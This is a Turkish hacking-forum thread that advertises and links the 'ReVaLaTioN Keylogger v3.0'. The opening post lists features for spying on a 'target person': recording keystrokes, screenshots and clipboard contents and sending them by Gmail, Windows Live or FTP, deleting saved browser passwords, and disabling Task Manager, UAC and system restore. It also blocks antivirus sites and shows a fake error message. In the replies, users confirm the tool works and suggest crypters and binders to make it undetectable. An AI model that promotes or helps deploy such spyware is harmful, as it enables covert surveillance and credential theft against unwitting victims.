ReVaLaTioN Keylogger v3.0 - Final Edition

JustMyLove

Yeni üye
22 Ocak 2012
17
0
Ön Bilgi; Keylogger bana ait değildir. sonra saçma yorumlar yapmayınız...

Sizlere ReVaLaTioN Keylogger'in 3. Sürümünü Tanıtacağım...

KeyloggerArayz.png

ReVaLaTioN Keylogger v3.0 Server Özellikleri;

Bilgileri Şifrele: Server ’i oluştururken girmiş olduğunuz mail gönderme bilgilerini şifreler. Hedef kişi bu bilgilere ulaşamaz.
Kayıtlı Verileri Sil: Hedef kişinin bilgisayarındaki kayıtlı şifreleri siler. (IE, Mozilla, Chrome vs. Tarayıcılardaki Bilgiler)
Sys. Geri Yükleme Kapat: Sistem geri yüklemeyi engeller.
Regedit ve CMD Kapat: Kayıt defteri ve CMD girişi engeller.
Ekran Klavyesini Kapat: Hedef kişi eğer ekran klavyesinden veri girişi yapmak isterse ekran klavyesi otomatik kapanır.
Antivirüs Sitelerini Blokla: Toplamda tam 50 tane virüs tarama sitesini engeller.
Sahte Hata Mesajı: Server açılır açılmaz ekrana sahte hata mesajı gelir.
Başlangıçta Çalıştır: Hedef kişi bilgisayarını resetlese bile bilgisayar açıldığında server çalışmaya devam eder.
Görev Yöneticisi Kapat: Görev yöneticisini kapatır.
UAC Kapat: Kullanıcı hesabı denetimini kapatır. Server yönetici olarak çalışırken hedef kişiye sezdirmez.

Log Süresi: Kayıt edilen logların kaç dakikada gönderileceğini ayarlar.
SS Süresi: Kayıt edilen ekran görüntülerinin kaç dakikada gönderileceğini ayarlar.
C-P Süresi: Kopyala / Yapıştır yapılan verilerin kaç dakikada gönderileceğini ayarlar.

* En büyük değişimlerden biri .NET Framework 4.0 değil 2.0 destek özelliği.
* Keyloggerda FTP - Windows Live - Gmail log gönderme destekleri bulunmaktadır.
* %100 TR Karakter destekli.
* Shift tuşuna basınca kapanma hatası giderildi.
* >£#$½{[]} gibi karakterlerin desteğini vermektedir.
* Başlangıca eklemede bazen oluşan hatalar giderildi.
* Belli zaman sonra log gelmeme hatası giderildi.

Gmail Log Görüntüleri;
Gmail.png

Windows Live Log Görüntüleri;
WindowsLive.png

FTP Log Görüntüleri;
FTP.png

ReVaLaTion Keylogger v3.0 İndir...

Virüs Tarama Sonuçları İçin Tıklayınız...

Videosunu izlemek için tıklayınız...

Kardeşim seninle acil konuşmam gerekiyor.Eklermisin

[email protected] lütfen.

CodServeR

Katılımcı Üye
16 Ara 2012
546
0
İzmir
kardesım ben indirdim denedim calısıyor sorun yok yani saolsın ama bir sorun var "baslata ekle" secenegını tıklayıcak kutucuk yok. Baslata ekle calıssa super olucak ama iste.

02mia02

Uzman üye
23 Ağu 2010
1,781
0
Adıyaman
kardesım 8.fonksıyonun sol tarafındakı kutucuka tıklanmıyor.. Sıstem geri yükleme kapat secengı kutucugn ustune gelmıs.. Yani baslatta calıstır kutucuguna tıklayamıyorum...

bazı crypterlar başlangıca ekleme seçeneği sunuyor. onlardan geçirip serverini başlangıca ekleyebilirsin.

CodServeR

Katılımcı Üye
16 Ara 2012
546
0
İzmir
bazı crypterlar başlangıca ekleme seçeneği sunuyor. onlardan geçirip serverini başlangıca ekleyebilirsin.

kardesım ne crypterı ya.. Crypter serverı fudlamaya yaramıyo mu kardesım,programla ne alakası var... Programda baslata ekle secenıgıne tıklayamıyorum,crypterla bunun alakası ne??

02mia02

Uzman üye
23 Ağu 2010
1,781
0
Adıyaman
kardesım ne crypterı ya.. Crypter serverı fudlamaya yaramıyo mu kardesım,programla ne alakası var... Programda baslata ekle secenıgıne tıklayamıyorum,crypterla bunun alakası ne??

hackforumsda görmüştüm. hatta burada paylaşan bile vardı. binderlada olabiliyor. ikisinde de bazı coderlar bu seçeneği koyuyor.

Son düzenleme:

STooP

Üye
14 Tem 2010
117
0
Ooo bu cok işime yaradı eyw kardeşim. Butona tıkladım :):d

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.